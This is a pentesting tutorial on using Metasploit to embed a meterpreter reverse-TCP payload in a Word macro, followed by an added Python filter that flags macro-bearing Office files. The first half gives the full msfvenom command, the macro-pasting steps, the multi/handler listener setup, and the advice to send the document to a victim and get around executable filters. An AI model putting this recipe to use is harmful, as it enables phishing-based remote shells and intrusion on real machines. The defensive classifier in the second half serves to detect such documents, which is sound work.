Penetration Testing using Malicious Macros in Word

Using Metasploit to create Malicious Word Document for Penetration Testing

The Metasploit framework has a couple of built-in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. This method is useful when going after client-side attacks and could also be useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. First we need to create our VBScript payload.
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your-IP> LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
The script is in two parts: the first part is created as a macro and the second part is appended to the document text itself.
Now transfer this script to a machine with Windows and Office installed. Taking Office 2007 as the standard, here is a quick guide on how to paste the macro:
View Macros -> name the macro and select "Create".
This should open the Visual Basic editor. Copy and paste the macro code here, then save the macro.
Paste the remainder of the script into the document.
Now set up a Metasploit listener.
Command: msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your-IP>
set LPORT 4444
Send the document to the victim and you should get a Meterpreter session on your attacker box. This method is best suited to penetration testing scenarios where the attacker needs to bypass filters that do not allow .exe files to be executed or uploaded during transfer.
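
The filtering gap described above, seen from the filter's side: the following is an added example, not code from the original post or from Metasploit, showing how a content filter can treat macro-bearing Office files the same way it treats executables. The function names, verdict strings and sample files are assumptions made for illustration, and the sample inputs are constructed in memory.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # legacy .doc/.xls compound file
MAX_XML = 1 << 20  # refuse to inflate an oversized [Content_Types].xml


def classify_office_file(data: bytes) -> tuple[str, str]:
    """Return (verdict, reason); verdict is 'block', 'inspect' or 'allow'."""
    if data.startswith(OLE_MAGIC):
        # Office 97-2003 binaries can carry VBA; hand off to an OLE-aware scanner.
        return "inspect", "legacy OLE container"
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):
        return "allow", "not an Office container"
    try:
        with zipfile.ZipFile(buf) as z:
            names = z.namelist()
            # Decide on content, not on the file extension the sender chose.
            if any(n.lower().endswith("vbaproject.bin") for n in names):
                return "block", "VBA project part present"
            if "[Content_Types].xml" in names:
                info = z.getinfo("[Content_Types].xml")
                if info.file_size > MAX_XML:
                    return "inspect", "oversized content-types part"
                if b"macroEnabled" in z.read(info):
                    return "block", "macro-enabled content type"
    except zipfile.BadZipFile:
        return "inspect", "corrupt zip container"
    return "allow", "no macro parts found"


def build_sample(with_macro: bool) -> bytes:
    """Constructed test input: a minimal OOXML-like zip, not a real document."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr("word/vbaProject.bin", b"\x00placeholder")
    return out.getvalue()


if __name__ == "__main__":
    for label, blob in [("plain", build_sample(False)),
                        ("macro", build_sample(True)),
                        ("legacy", OLE_MAGIC + b"\x00" * 16)]:
        print(label, classify_office_file(blob))
```

Files that come back as "inspect" are the legacy binary formats and malformed containers, which need an OLE-aware macro scanner before release.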

